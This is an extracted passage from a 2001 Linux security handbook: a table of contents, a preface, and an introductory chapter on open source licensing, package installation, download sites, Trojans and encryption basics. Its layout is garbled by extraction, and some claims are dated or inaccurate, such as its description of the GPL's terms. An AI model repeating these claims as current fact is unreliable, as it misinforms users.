Key Encryption for +All data transmitted Secure Authentication of VPN +between the devices +Endpoints 424 +through the tunnel is +secure, regardless of what Starting the Tunnel 434 +programs the devices are Capturing VPN Tunnel Traffic 436 +running. +Closing the VPN Tunnel 438 +Summary 439 +Solutions Fast Track 440 +Frequently Asked Questions 441 +Chapter 9 Implementing a Firewall +with Ipchains and Iptables 445 +Introduction 446 +Understanding the Need for a Firewall 447 +Building a Personal Firewall 449 +Understanding Packet Filtering +Terminology 450 + +138_linux_ToC 6/20/01 9:27 AM Page xxii +xxii Contents +Choosing a Linux Firewall Machine 452 +Protecting the Firewall 452 +Understand Essential Deploying IP Forwarding and Masquerading 453 +Linux Firewall +Masquerading 456 +Functions +Configuring Your Firewall to Filter Network +Packets 458 +(cid:2) IP address conservation +and traffic forwarding Configuring the Kernel 460 +Packet Accounting 460 +(cid:2) Network differentiation +Understanding Tables and Chains in a Linux +(cid:2) Protection against +Firewall 461 +denial-of-service, +scanning, and sniffing Built-In Targets and User-Defined Chains 462 +attacks +Specifying Interfaces 463 +(cid:2) IP and port Setting Policies 464 +(cid:2) Content filtering Using Ipchains to Masquerade Connections 467 +(cid:2) Packet redirection Iptables Masquerading Modules 468 +Using Iptables to Masquerade Connections 468 +(cid:2) Enhanced +authentication and Iptables Modules 470 +encryption Exercise:Masquerading Connections +(cid:2) Supplemented logging Using Ipchains or Iptables 471 +Logging Packets at the Firewall 471 +Setting Log Limits 472 +Adding and Removing Packet Filtering Rules 472 +ICMP Types 473 +Exercise:Creating a Personal Firewall +and Creating a User-Defined Chain 475 +Redirecting Ports in Ipchains and Iptables 477 +Configuring a Firewall 478 +Setting a Proper Foundation 478 +Creating Anti-Spoofing Rules 479 +Counting Bandwidth Usage 483 +Listing and Resetting Counters 484 +Setting Type of Service (ToS) in a Linux +Router 484 +Setting ToS Values in Ipchains and Iptables 486 +Using and Obtaining Automated Firewall Scripts +and Graphical Firewall Utilities 488 + +138_linux_ToC 6/20/01 9:27 AM Page xxiii +Contents xxiii +Firewall Works in Progress 490 +Exercise:Using Firestarter to Create a +Personal Firewall 490 +Exercise:Using Advanced Firestarter +Features 498 +Summary 500 +Solutions Fast Track 500 +Frequently Asked Questions 505 +Chapter 10 Deploying the Squid +Web Proxy Cache Server 507 +Introduction 508 +Benefits of Proxy Server Implementation 508 +Proxy Caching 508 +Network Address Translation 510 +Differentiating between a Packet Filter and +a Proxy Server 512 +Implementing the Squid Web Proxy +Cache Server 513 +Configure Squid +with the /etc/squid/ System Requirements Specific to Proxy +squid.conf file Caching 516 +Installing Squid 517 +Configuring Squid 520 +The http_port Tag 522 +The Cache_dir Tag 523 +The acl Tag 525 +The http_access Tag 526 +Starting and Testing Squid 528 +Configuring Proxy Clients 529 +Configuring Netscape Navigator and Lynx 530 +Configuring Netscape Navigator 530 +Configuring Lynx 532 +Configuring Internet Explorer (Optional) 533 +Summary 535 +Solutions Fast Track 536 +Frequently Asked Questions 538 + +138_linux_ToC 6/20/01 9:27 AM Page xxiv +xxiv Contents +Chapter 11 Maintaining Firewalls 543 +Introduction 544 +Testing Firewalls 544 +IP Spoofing 546 +Open Ports/Daemons 546 +Monitoring System Hard Drives,RAM, +and Processors 547 +Suspicious Users,Logins,and Login +Times 547 +See How to Use the Check the Rules Database 548 +Firelogd Program Verify Connectivity with Company +Management and End Users 548 +Firelogd(Firewall Log Remain Informed Concerning the +Daemon) is a relatively +Operating System 549 +simple program that can +either be run as an Port Scans 549 +application or (you might Using Telnet,Ipchains,Netcat,and SendIP to +have guessed) as a +Probe Your Firewall 550 +daemon. It does two +things: Ipchains 551 +Telnet 551 +(cid:2) It reads the kernel log +entries and passes Using Multiple Terminals 552 +them into a "first in, Netcat 552 +first out" (FIFO) pipe, +Sample Netcat Commands 554 +which Firelogd can +then process. Additional Netcat Commands 555 +Exercise:Using Netcat 557 +(cid:2) Once its buffer is full, it +e-mails a report of SendIP:The Packet Forger 558 +suspicious traffic to an SendIP Syntax 558 +account of your +Exercise:Using SendIP to Probe a +choosing. You can have +it mailed to a local Firewall 560 +account, or to a Understanding Firewall Logging,Blocking,and +remote system of your +Alert Options 563 +choice. +Firewall Log Daemon 563 +Obtaining Firelogd 563 +Syntax and Configuration Options 563 +Message Format 564 +Customizing Messages 566 +Reading Log Files Generated by Other +Firewalls 568 + +138_linux_ToC 6/20/01 9:27 AM Page xxv +Contents xxv +Exercise:Configuring and Compiling +Firelogd 568 +Fwlogwatch 569 +Fwlogwatch Modes 570 +Fwlogwatch Options and Generating +Reports 572 +Exercise:Generating an HTML-Based +Firewall Log with Fwlogwatch 575 +Automating Fwlogwatch 575 +The Fwlogwatch Configuration File 576 +Notification Options 579 +Response Options 581 +Exercise:Configuring Fwlogwatch to +Send Automatic Alerts and Block Users 583 +Using Fwlogwatch with CGI Scripts 584 +Obtaining More Information 586 +Viewing the Results 587 +Exercise:Using Cron and Fwlogwatch +CGI Scripts to Generate an Automatic +HTML Report 588 +Additional Fwlog Features 590 +Obtaining Additional Firewall Logging Tools 590 +Summary 593 +Solutions Fast Track 593 +Frequently Asked Questions 597 +Appendix A Bastille Log 599 +Appendix B Hack Proofing +Linux Fast Track 605 +Index 637 + +138_linux_ToC 6/20/01 9:27 AM Page xxvi + +138_linux_pref 6/20/01 9:28 AM Page xxvii +Preface +Hack Proofing Linux:A Guide to Open Source Security is designed to help you deploy a +Linux system on the Internet in a variety of security roles.This book provides prac- +tical instructions and pointers concerning the open source security tools that we use +every day. +First,we show you how to obtain the software;and then,how to use the Bastille +application to “harden”your Linux operating system so that it can function securely as +it fulfills a specific role of your choice (e.g.,as a Web server,as an E-mail server,and so +forth).You will also learn how to use your Linux system as an auditing tool to scan +systems for vulnerabilities as well as create an Intrusion Detection System (IDS), +which enables your Linux system to log and respond to suspicious activity.From virus +protection to encrypting transmissions using Gnu Privacy Guard and FreeSWAN,you +will be able to configure your system to secure local data as well as data that will be +passed along the network.After reading this book,you will be able to identify open +source and “for-fee”tools that can help you further secure your Linux system. +We have also included chapters concerning ways to sniff and troubleshoot net- +work connections and how to implement strong authentication using One Time +Passwords (OTP) and Kerberos.Tools such as Squid proxy server and Ipchains/Iptables +will help you use your Linux system so that it can act as a firewall.With the tools on +the accompanying CD as well as the advice and instructions given in this book,you +will be able to deploy your Linux system in various roles with confidence. +We decided to focus on profiling the most commonly used security tools found +on the Linux platform.We also decided to emphasize the real-world implementation +of these tools,as opposed to just providing conceptual overviews.Finally,we decided +to describe the steps you should take when things go wrong.As a result,we have +created a book that is a valuable resource that helps you use your Linux system as +efficiently as possible. +xxvii + +138_linux_pref 6/20/01 9:28 AM Page xxviii +xxviii Preface +One of the most exciting things about this book is that it provides hands-on +instructions for implementing security applications.From Gnu Privacy Guard (GPG) +and Bastille to FreeSWAN,Kerberos,and firewall troubleshooting utilities,this book +shows you how to use your Linux skills to provide the most important security ser- +vices such as encryption,authentication,access control,and logging. +While writing the book,we had the following three-part structure in mind: +(cid:2) Locking Down the Network (Chapters 1 through 4) +(cid:2) Securing Data Passing Across the Network (Chapters 5 through 8) +(cid:2) Protecting the Network Perimeter with Firewalls (Chapters 9 through 11) +Each of these sections is designed to help you find the best solution for your par- +ticular situation.Although the book itself isn’t explicitly divided into sections,as you +are reading remember this rough division because it will help you to implement +security measures in your own environment. +Chapter 1 discusses open source concepts,including the GNU General Public +License,as presented by the www.gnu.org people (the Free Software Foundation), +and then moves on to showing how you can use GPG and Pretty Good Privacy +(PGP) to encrypt transmissions and also to check the signatures of files that you +download from the Web.It also provides information concerning the steps to take +when auditing a network. +Chapter 2 shows you how to lock down your operating system so that it provides +only those Internet services that you desire.Chapter 3 shows you how to use applica- +tions such as AntiVir,Gnome ServiceScan,Nmap,Rnmap,and Nessus to scan for +vulnerabilities.In Chapter 4,you will learn about host and network-based IDS applica- +tions such as Snort,Tripwire,and PortSentry.Chapter 5 explains how to use network +sniffers such as Tcpdump,Ethereal,and EtherApe to their full advantage.With this +knowledge,auditing a network and truly understanding what is going on “beneath the +hood”will make you a much more effective network security administrator. +By the time you finish Chapter 6,you will know how to deploy One Time +Passwords and Kerberos,and in Chapter 7,you will understand how to avoid sniffing +attacks,and in Chapter 8,you will enable IPSec by deploying FreeSWAN.Chapter 9 +empowers you to create personal firewalls as well as packet filtering firewalls using +either Ipchains or Iptables.Chapter 10 shows you how to implement Squid so that +you can more carefully monitor and process packets.Finally,Chapter 11 provides you +with tools that test your firewall implementation. +www.syngress.com + +138_linux_pref 6/20/01 9:28 AM Page xxix +Preface xxix +The open source community has fulfilled the need for a powerful,free system +that allows you to conduct audits,serve up Web pages,provide e-mail services,or any +other Internet service you wish to provide.Once you are able to take advantage of +the security software provided by the open source community,you will receive the +benefit of having a huge pool of developers working for you.You will gain more +freedom because you will be able to choose widely tested security tools provided by +a variety of skilled developers.You can even choose (at your own risk) to use rather +obscure tools that have been recently created.It is up to you. +Open source operating systems and security tools are both a blessing and a curse: +You are blessed with (usually) free software,but you are then cursed with having to +spend time working with the software’s idiosyncrasies.By reading this book and +implementing the tools and practices we’ve described,you should be able to mini- +mize the “curse.”It is also our hope that as you read this book you will also become +further involved in the open source software movement,which has begun to fulfill its +promise of creating powerful,useful software. +—James Stanger,Ph.D.,MCSE,MCT +www.syngress.com + +138_linux_pref 6/20/01 9:28 AM Page xxx + +138_linux_01 6/20/01 9:25 AM Page 1 +Chapter 1 +Introduction to +Open Source +Security +Solutions in this chapter: +(cid:2) Using the GNU General Public License +(cid:2) Soft Skills: Coping with Open +Source Quirks +(cid:2) Should I Use an RPM or Tarballs? +(cid:2) Obtaining Open Source Software +(cid:2) A Brief Encryption Review +(cid:2) Public Key and Trust Relationships +(cid:2) Auditing Procedures +(cid:59) Summary +(cid:59) Solutions Fast Track +(cid:59) Frequently Asked Questions +1 + +138_linux_01 6/20/01 9:25 AM Page 2 +2 Chapter 1 • Introduction to Open Source Security +Introduction +In spite of the ups and downs of the dot-com industry,open source software has +become a viable alternative to commercial companies such as Microsoft,Sun,and +IBM.Although open source software has its quirks and its problems,the open +source movement has made its niche in the networking market.As a networking +professional,it is in your best interest to understand some of the more important +security applications and services that are available. +This book is designed to provide experienced systems administrators with +open source security tools.Although we have made every effort to include as +many people and as many skill sets as possible,this book assumes a fundamental +knowledge of Linux.This book focuses on open source Linux applications,dae- +mons,and system fixes.In the book’s first chapters,you will learn how to lock +down your network.Chapter 2 discusses ways to secure and monitor the oper- +ating system,and ways to scan local and remote networks for weaknesses.You will +receive detailed information on how to ensure that your system’s services and the +root account are as secure as possible. +In Chapter 3,you will learn how to deploy antivirus and scanning programs +for your local system.By using these scanning programs,you will be able to miti- +gate risk and learn more about the nature of services on your network.Scanners +such as nmap and nessus will help you learn about the open ports on your net- +work,and how these open ports might pose a threat to your system.Chapter 3 +gives you detailed information about practical ways to implement intrusion +detection on your local system and on your network.Using applications such as +Tripwire,Portsentry,and Snort,you will be able to precisely identify system +anomalies and detect inappropriate logins.Chapter 5 shows how you can use +open source tools such as tcpdump,Ethereal,EtherApe,and Ntop to inspect and +gauge traffic on the network. +The second part of the book focuses on ways to enhance authentication using +open source software.In Chapter 6,you will learn about One Time Passwords +(OTP) and Kerberos as ways to ensure that malicious users won’t be able to obtain +your passwords as they cross the network.Chapter 7 discusses ways to use Secure +Shell (SSH) and Secure Sockets Layer (SSL),which are ways to enable on-the-fly +encryption to protect data.In Chapter 8,you will learn about how to enable +IPSec on a Linux system so that you can implement a virtual private network +(VPN).As you learn more about the primary VPN product called Free Secure +Wide Area Network (FreeS/WAN),you will see how it is possible to protect net- +work traffic as it passes through your own network,and over the Internet. +www.syngress.com + +138_linux_01 6/20/01 9:25 AM Page 3 +Introduction to Open Source Security • Chapter 1 3 +The final part of the book focuses on ways to create an effective network +perimeter.Chapter 9,shows how to install and configure Ipchains and Iptables on +a Linux system.Kernels earlier than 2.3 can use Ipchains,whereas kernel versions +2.3 and later use Iptables.Regardless of the way you do it,you will learn to filter +traffic with these two packet filtering tools. +In Chapter 10,you will learn how a proxy server can further enhance your +control over your network perimeter.Specifically,you will use the Squid proxy +server to control client access to the Internet.You will also learn how to con- +figure Linux clients to access the proxy server.Finally,Chapter 11,shows how to +troubleshoot and counteract problems with your network perimeter.You will +learn how to maintain,test,and log the firewall so that you have a functional bar- +rier between you and the outside world. +It is our intention to create a book that gives you practical information and +advice about the most common open source security tools. +The Tools Used in This Book +This book was written using version 7.0 of the Red Hat Linux operating system. +Although it may not be the “best”Linux distribution (there are at least 100 ver- +sions in the world),it is the most popular.We have tried to ensure that the skills +and tools you obtain in this book will be portable to other Linux versions,and +even other open source operating systems such as FreeBSD (www.freebsd.org). +However,each Linux flavor has its own quirks,and you may find it necessary to +deviate from some of the instructions in this book. +Using the GNU General Public License +The GNU General Public License (GPL) is the basis of the open source move- +ment.This license is provided by the Gnu is Not Unix (GNU) organization, +which develops various software packages.Begun in 1984 by Richard Stallman, +GNU has worked to create a license designed to ensure that the open source +movement continues to thrive.You can learn more about GNU at the +www.gnu.org Web site,shown in Figure 1.1. +The most important element of this license is that instead of protecting a par- +ticular person or company,it protects the software code that creates the applica- +tion.Traditionally,copyrights have enabled individuals to lay claim to a particular +piece of software and then sell it for profit.In addition,the copyright enables that +individual to then take action against anyone else who uses that code to create +www.syngress.com + +138_linux_01 6/20/01 9:25 AM Page 4 +4 Chapter 1 • Introduction to Open Source Security +similar functionality.For better or for worse,Richard Stallman,Eric Raymond, +and others helped found and popularize the concept of an open software license +called the Gnu General Public License (often referred to as the GPL).You can +read the GPL at www.gnu.org/copyleft/gpl.html. +Figure 1.1 The GNU Web Site +This license is part of the “copyleft”movement,which considers itself an +alternative to traditional copyright laws.The GPL essentially allows anyone who +develops code to ensure that the code remains open,meaning that GPL-licensed +code can be taken and improved upon by anyone,as long as the improved code is +given to the original writer and the software writing community.Consequently,a +piece of code protected by the GPL will,by law,always remain accessible by +anyone who wants to read or modify it.Without the GPL license,another person +can take the code that you invent,and make it closed and proprietary. +The GNU GPL is not the only free software license in existence.Figure 1.2 +shows the GNU page dedicated to understanding additional licenses.If you +wish,you can read about additional licenses that are similar to the GPL at +www.gnu.org/philosophy/license-list.html. +For more information about the open source movement,one of the more +revealing books is Erik Raymond’s The Cathedral and the Bazaar (O’Reilly & +www.syngress.com + +138_linux_01 6/20/01 9:25 AM Page 5 +Introduction to Open Source Security • Chapter 1 5 +Associates,2001).Although somewhat overly enthusiastic,it is a very helpful book +in understanding the mindset of many open source code writers. +Figure 1.2 Viewing GNU’s Licenses Comment Section +Fee-Based GPL Software +Contrary to what you might think,open source code protected by the GPL is not +necessarily free.Under the terms of the GPL,any person or corporation can take +GPL software,modify it,and then package it for sale.However,this person or cor- +poration must make this software freely available for anyone to read or modify. +Can I Use GPL Software in My Company? +The GNU GPL does not ask companies to supply licensing agreements or other- +wise register the programs.However,other licenses,which you can read at +GNU’s comparative forum,may invoke restrictions that you may have to consider +as you implement the software.The software covered in this book is,in one way +or another,open software,which means it can be used by any organization. +www.syngress.com + +138_linux_01 6/20/01 9:25 AM Page 6 +6 Chapter 1 • Introduction to Open Source Security +Soft Skills: Coping with +Open Source Quirks +You should consider,however,that open source software can present challenges. +Consider them before you delve into the open source world.It is likely that +using open source software will require you to use your “soft skills,”such as how +to overcome objections and manage constant change.The more important chal- +lenges to your soft skills are discussed in the following sections. +General Lack of Installation +and Configuration Support +Although many of the applications you will use are written by clever,knowl- +edgeable coders,most of these people create this code on their own time.Thus, +no formal support structure exists for the software you use.As a result,you will +be forced to rely on knowledgeable individuals to implement and maintain your +open source applications. +Infrequent or Irregular Update Schedules +Many closed-source companies update their software at regular periods.Usually,a +for-profit company’s desire to keep sales high by requiring constant for-fee +upgrades is tempered by its need to maintain the product’s reputation for stability, +ease of use,and longevity.Thus,upgrades will happen at regular intervals. +However,the open source community is not held in check by this desire. +Generally,software is frequently upgraded.You may,therefore,find that you will +have to spend considerable time upgrading the open source products you use. +It is also quite unlikely that you will be notified of any problems that have +been discovered in the specific version of your application.For example,many +for-profit companies spend time publicizing problems and even contacting +licensed users to notify them of a security problem.If you use an open source +security application,the burden is placed on you:it is assumed that you will take +the time to keep current about any developments concerning the application you +are using. +Command-Line Dominance +Many open source applications use command-line interfaces.In the past several +years,the trend has been to create a graphical user interface (GUI) for command- +www.syngress.com + +138_linux_01 6/20/01 9:25 AM Page 7 +Introduction to Open Source Security • Chapter 1 7 +line applications.Generally,however,these GUI interfaces are not as portable +between operating systems.In some cases,the GUI interface,unless superbly +written,does not provide the same functionality (that is,you can’t do the same +thing with the GUI that you can at the command line). +Lack of Backward Compatibility +and No Regular Distribution Body +When you upgrade an operating system,it is possible that the applications you +have been using no longer work,or behave differently.Although the open source +community is remarkably well coordinated,you should consider this possibility. +Furthermore,it is possible that the software you use may become unavailable, +or may become fee based.While discovering that a Web site URL has changed is +inconvenient,discovering that an upgrade for your favorite application will now +cost you money can raise serious issues about your continued use of the product. +Inconvenient Upgrade Paths +Many open source applications change their coding rather radically.As a result,a +previous version may not be upgradeable,and you may have to reinstall it.Even +then,it is possible that a simple reinstallation is not possible.Many open source +applications provide their own versions of a Windows-style configuration wizard, +but when you upgrade,you may have to install the new files manually. +Conflicts in Supporting Libraries +and Limited Platform Support +Even though you find a piece of software that you really find interesting,it is +possible that you will have to take rather intricate steps to make your operating +system ready for the application.Most of these steps involve updating system +libraries,which are sets of routines and helper applications.Examples of libraries +include the Tool Command Language/Tool Kit (tcl/tk) and the Gnome libraries +(gnome-lib). +Often,steps for upgrading these libraries are poorly documented and rather +difficult to follow.Additionally,operating systems such as Linux are loosely inte- +grated,which means that no central “brain,”such as a Windows 2000 registry, +exists to coordinate library usage.So,even though you may be able to enable +your system to accept your cool new application,you may end up causing +incompatibilities that cause other applications to fail. +www.syngress.com + +138_linux_01 6/20/01 9:25 AM Page 8 +8 Chapter 1 • Introduction to Open Source Security +Another problem with software that isn’t quite “ready for prime time”is that +it may be developed for only one Linux flavor,or even only one version of a +specific Linux flavor.If you upgrade your system (or one of the libraries),it is +possible that the application will stop working +Interface Changes +Coders and end users rarely want radical changes in a GUI interface to occur. +Changing an interface requires more coding work on the part of coders,and it +could result in an application losing popularity.However,due to changes in the +open source libraries and in coding practices,you may find that commands and +interfaces are radically changed from one version to the next. +Partially Developed Solutions +Sometimes,the code you want to use promises to do things it just can’t deliver. +Some expected or advertised features may be missing,or may not be implemented +yet.Sometimes,this happens because the open source application’s development +team has the best of intentions and is working to complete the project.Other +times,the development team runs out of gas,and you end up wishing that the +application had delivered on its potential. +In such cases,your options are rather limited,unless you have the means at +your disposal to deploy your own development team and take up the project +where your predecessors left off. +Developing & Deploying… +Open Source as Malware? +Thus far, you have learned about technical issues concerning open +source software. However, there are business and security issues as well. +If you are a manager, make sure you carefully consider the use of open +source software. There may be times when open source software is not +appropriate for a certain task. Consider the following questions: +(cid:2) Aren’t these hacker programs? +(cid:2) Do I have time to train my employees on this software? +Continued +www.syngress.com + +138_linux_01 6/20/01 9:25 AM Page 9 +Introduction to Open Source Security • Chapter 1 9 +(cid:2) Is the software stable enough to use? +(cid:2) Have I had the code reviewed to ensure it is safe? +(cid:2) How will I explain the use of open source software to my +management? +(cid:2) How will I explain the use of open source software to cus- +tomers and business partners? +The first question is significant. Many open source security applica- +tions have been written as proof of concept exploits. A proof of concept +exploit is basically an application meant to prove that a theoretical or +much-discussed weakness in an operating system really does exist. Other +applications are provided to allow hackers to gain information about a +network or network host. However, just because an application was cre- +ated for malicious intent does not necessarily mean that it has to be +used maliciously. In fact, many open source applications have been cre- +ated with the best of intentions, only to have them used to cause prob- +lems. Therefore, as a manager, you should ensure that all parties +involved in maintaining your network understand that simple use of a +particular application does not necessarily mean that the user has +become a hacker. +As you choose the software, make sure that you actually take some +time to educate your IT employees so that they use it properly. Have +them consider how using the application can affect the network. If used +at certain times, using a network probing application may cause too +much network traffic and thus impact end-user communication. In addi- +tion, when you choose this application, consider that it may still be in +beta development, and that certain features are bound to change. +Because it is difficult to verify that this code is in fact safe, take the +time to review it. If you cannot do it yourself, contact a reliable source +to verify that the code does not contain an element, such as a Trojan +horse, that can erode your network’s security. +Finally, it is possible that you may have to explain why your com- +pany uses open source applications. Increasingly, business partners and +insurance companies are interested in knowing exactly how you audit +your systems. In some situations, you may find yourself having to explain +why using open source applications is appropriate. In other cases, you +may find that using open source software is wholly inappropriate. +www.syngress.com + +138_linux_01 6/20/01 9:25 AM Page 10 +10 Chapter 1 • Introduction to Open Source Security +Should I Use an RPM or Tarballs? +In regard to Linux,open source software generally comes in three flavors:source +tarball,Red Hat Package Manager (RPM),and Debian.A source tarball is a group +of files and directories that usually must be compiled.Generally,tarballs come with +a special file called a makefile,which contains instructions that tell the source code +where the supporting libraries are for the application you are installing.Many will +argue passionately that one is better than the other (or,that one operating +system—such as the Debian operating system—is better than all the rest).The best +approach to take is to use the right tool for the right job.In some cases,tarballs +will work best.In other cases,using RPMs is the best way,as long as the RPM +was created by a person who really understands the operating system,and that you +have chosen the correct RPM for your operating system version. +Tarball +When using source tarballs,the most portable and extensible format,the code +usually comes in packages that are first run through the tar application,which cre- +ates archives of files and directories that can then be easily transported from one +system to another.Sometimes,the tarball contents are precompiled binaries,which +means that all you have to do is decompress and install the application.Other +times,the code comes as C or (less often) C++ “source code,”which must then +be compiled using,for example,the makefiles and the Gnu CC (gcc) or Gnu +C++ gc++ compilers.These tarball packages are then compressed by using any +number of applications.The most common (de)compression programs are GNU +Zip (gzip,gunzip,gzcat) programs,which create compressed tarball archives +with a tar.gz,.tgz,or tar.Z ending.The gzip command creates the tar.gz ending. +The .tgz extension is also created in gzip by those who know that their files may +be downloaded by Microsoft-oriented browsers,which often have difficulty +downloading files with the tar.gz ending.The .Z extension is created by the Unix +command called compress.Slackware systems often use the .tgz tarball ending. +The bzip program has also become popular.Compressed bzip files have a .bz +ending.Generally,you install a gzipped tarball by using the tar -zxvf command. +The source code that comes in source code tarballs can be edited to conform +to your own system.Perhaps more importantly,source tarballs allow you to +specify compile options that can greatly extend the usefulness of the application +or daemon you wish to install.You will be given explicit instructions whenever +this is necessary.Also note that tarballs can contain pre-compiled binary applica- +tions and supporting files rather than source code. +www.syngress.com + +138_linux_01 6/20/01 9:25 AM Page 11 +Introduction to Open Source Security • Chapter 1 11 +Tarballs often require editing of a special file called a makefile.However,this is +not necessarily all that difficult.It simply requires that you know where your sup- +porting applications and libraries are.In addition,most open source software will +contain instructions concerning how to edit the makefile.Most well-known +operating systems,such as Red Hat Linux and Slackware,do not require makefile +modification. +Red Hat Package Manager +Originally developed by Red Hat,Red Hat Package Manager (RPM) files have +become more universal.TurboLinux,Mandrake,and Kondara,for example,all +support this format.RPMs come in either precompiled binary format,or as +source RPMs.Make sure that you obtain the correct RPM for your distribution +and hardware.You can then install an RPM (barring library and resource con- +flicts) by using the rpm -ivh command.These packages usually contain precom- +piled binary files,but it is possible to install source RPMs (.srpm) that will deposit +source code that you must then compile using make and the appropriate gcc and +g++ compilers. +RPMs are installed using the RPM utility.To install an RPM,you could +enter the following command: +host# rpm –ivh packagename.versionnumber.i386.rpm +This command uses the -I option,which simply means install.The -vh +options have the RPM utility go into verbose mode and report the installation +progress using hash marks.You can learn more about the RPM facility by con- +sulting the rpm man page.As you will see in later sections,tarball,RPM,and +Debian packages can pose threats to your system—after all,they are designed to +automatically place code onto your system.Many times,this code is precompiled +and “ready to go.”It is possible for malicious users to place code into these pack- +ages.You must be extremely careful whenever installing any of these packages. +Later in this chapter,you will see how you can at least partially protect yourself +by using digital signatures. +Debian +Debian (.deb) Linux uses .deb packages in a similar way that Red Hat,for +example,uses RPMs.Debian packages are installed by using the dpkg -i com- +mand.As with tarballs and RPM files,these packages can also contain source +files,rather than precompiled binaries. +www.syngress.com + +138_linux_01 6/20/01 9:25 AM Page 12 +12 Chapter 1 • Introduction to Open Source Security +Obtaining Open Source Software +Now that you have considered some of the more pressing open source issues,it’s +time to learn where to get open source security software.As you might suspect, +there is no single source.Some of the best Web sites for open source security +software include the following (many other sources exist): +(cid:2) SourceForge www.sourceforge.com +(cid:2) Freshmeat www.freshmeat.net +(cid:2) Packetstorm http://packetstorm.securify.com +(cid:2) RPMFind www.rpmfind.net +(cid:2) LinuxLinks www.linuxlinks.com +(cid:2) Tucows www.tucows.com +(cid:2) Startplaza www.startplaza.nu +(cid:2) SecurityFocus www.securityfocus.com +(cid:2) AtStake www.atstake.com +SourceForge +SourceForge,shown in Figure 1.3,is an especially rich source for security con- +tent.From here,you can download applications such as EtherApe,Ethereal,and +many others. +One of the primary benefits of obtaining software from SourceForge is that +you can learn about the development history,learn about the developers of an +application,and even send the developers e-mail (good luck getting answers!). +You can also learn about what language the program was developed in,and what +operating systems the application was specifically developed for.In many ways, +this site does much of the research for you. +Finally,SourceForge provides a login feature that allows you to: +(cid:2) Participate in open discussions concerning software. +(cid:2) Register an open source project. +(cid:2) Learn about top projects. +(cid:2) Obtain information about various topics,including the latest Linux +kernel development updates. +www.syngress.com + +138_linux_01 6/20/01 9:25 AM Page 13 +Introduction to Open Source Security • Chapter 1 13 +Figure 1.3 The SourceForge Web Site +Freshmeat +The Freshmeat Web site,shown in Figure 1.4,derives its name from its primary +function,which is to provide the latest and greatest software from the open +source community.Like SourceForge,this site is not completely devoted to secu- +rity.Nevertheless,you should spend time at this site to learn about the latest +applications,most of which are created for Linux.By just typing security in the +search field,you can learn about the latest applications meant to increase security, +as well as those meant to defeat existing security measures. +This site also provides a login feature.One of the benefits of logging in is the +ability to catch up on the latest projects that have been registered on the site.In +less than a week,several hundred new projects can be registered,many of them +having to do with security.Another benefit is the ability to search for articles +written about the applications in which you are interested.The search feature +includes filtering mechanisms designed to help you drill down to the most +relevant information. +www.syngress.com + +138_linux_01 6/20/01 9:25 AM Page 14 +14 Chapter 1 • Introduction to Open Source Security +Figure 1.4 The Freshmeat Web Site +Figure 1.5 The Packetstorm Web Site +Packetstorm +Packetstorm is specifically devoted to security,and has an extensive collection of +files.At this site,shown in Figure 1.5,you can download both “white hat”and +“black hat”applications;in other words,you can download applications that help +www.syngress.com + +138_linux_01 6/20/01 9:25 AM Page 15 +Introduction to Open Source Security • Chapter 1 15 +detect and/or stop intrusions,or you can download applications specifically +designed to break into systems.The developers of the site spend a great deal of +time surfing the top Internet sites (including SourceForge and Freshmeat) for the +“latest and greatest”files. +One of the many convenient features of this site is its listing of the most +recent tools,exploits,and warnings the site has obtained.Another is its Forums +feature,which allows you to converse with others interested in security.The site +also lists the most current advisories,so you can see if anyone has discovered a +problem in any of the open source applications you are using. +SecurityFocus +The SecurityFocus site is a well-organized repository of security files.Its home +page is shown in Figure 1.6.As well organized as it is,its collection of files,found +in the Tools section,is not as extensive.Still,the site provides informative news +about the latest security developments,and does a good job archiving the latest +security files. +Figure 1.6 The SecurityFocus Web Site +www.syngress.com + +138_linux_01 6/20/01 9:25 AM Page 16 +16 Chapter 1 • Introduction to Open Source Security +Is That Download Safe? +Another problem with open source code is that you spend a great deal of time +downloading files from untrusted sites.As a security professional,you have to +consider the possibility that some of these files may have been tampered with. +Many in the open source community have encountered files that contain Trojan +horses,which are stealthy programs meant to thwart security.Trojan code hides +legitimate code.Sometimes,the Trojan can wait to activate,or it can activate itself +when you install what appears to be a perfectly legitimate program.Examples of +Trojan horses include: +(cid:2) Illicit servers Hidden servers that open ports that allow a malicious +user (usually) root access to the server. +(cid:2) Root kits Programs,such as ps,ls,or su,which will still work,but also +thwart security by,for example,key logging the administrator’s password +and then sending it to an anonymous FTP.The malicious user can then +download the password and log in to the system. +So,how can you determine if this download is secure? One of the best ways +is to obtain a digital signature for the software package.A digital signature is a small +piece of code generated by an encryption algorithm.A signature allows you to +determine two things.First,you can learn if the file has been tampered with in +any way.Second,you can use the key to verify that the software was in fact +authored by the person who claims authorship.Before you learn more about +checking signatures,it is important that you first understand the basic encryption +principles involved. +A Brief Encryption Review +One of the most important things you can understand in terms of open source +security is how encryption operates on networks.Feel free to skip this section if +you already understand these terms.If you don’t,then read on.They will be +implied throughout this book. +Why is encryption important? At one time,Microsoft’s old LANmanager +product (a precursor to Windows NT and 2000) did not encrypt its passwords as it +communicated with other hosts.As a result,this particular operating system fell +out of favor,forcing Microsoft to improve its product.One of those improvements +was the use of encrypted transmissions.Encryption is not a foolproof solution.It is +possible to misconfigure your encryption tools,and even properly encrypted +www.syngress.com + +138_linux_01 6/20/01 9:25 AM Page 17 +Introduction to Open Source Security • Chapter 1 17 +transmissions are not completely safe.Nevertheless,encryption does tend to raise +the bar enough to make most hackers search for other systems to attack. +Before we continue,it is important to understand the three types of encryp- +tion in general use: +(cid:2) Symmetric The use of one key to encrypt and decrypt information. +This is a common type of encryption,but can be easily defeated if you +misplace the key,or if a malicious user intercepts the key in transit.If a +malicious user is able to intercept the key,he or she can then use it to +decrypt your secret messages. +(cid:2) Asymmetric This type of encryption uses a mathematically related key +pair to encrypt and decrypt information.It is commonly used on the +Internet and on LANs,because it reduces the likelihood that the key can +be learned by a malicious user,and aids in authentication. +(cid:2) One way The use of an algorithm to encrypt information so that it is, +mathematically speaking,impossible to unencrypt it.One-way encryp- +tion is also used to read a file and then create a hash of that file.The +resulting hash value is said to be mathematically unrecoverable. +You should understand that in regard to networking,the “information”dis- +cussed in this section can include a file,or a series of network packets emanating +from a network host.Many encryption applications,such as GNU Privacy Guard +(GPG) and Pretty Good Privacy (PGP) employ all three of these types of encryp- +tion,as you will see later. +Symmetric Key Encryption +Your car key is a crude,although helpful,example of symmetric encryption. +Consider that most people use the same physical key to lock,unlock,and start +their cars.If you lose your key,anyone who finds it can locate your car,insert +your key in the door and the ignition,and then drive it away.Suppose,now,if +you tried to pass this key to another person in a crowded room,and someone +you do not trust was to intercept it.You would probably then have a problem:the +only thing keeping this untrusted person out of your 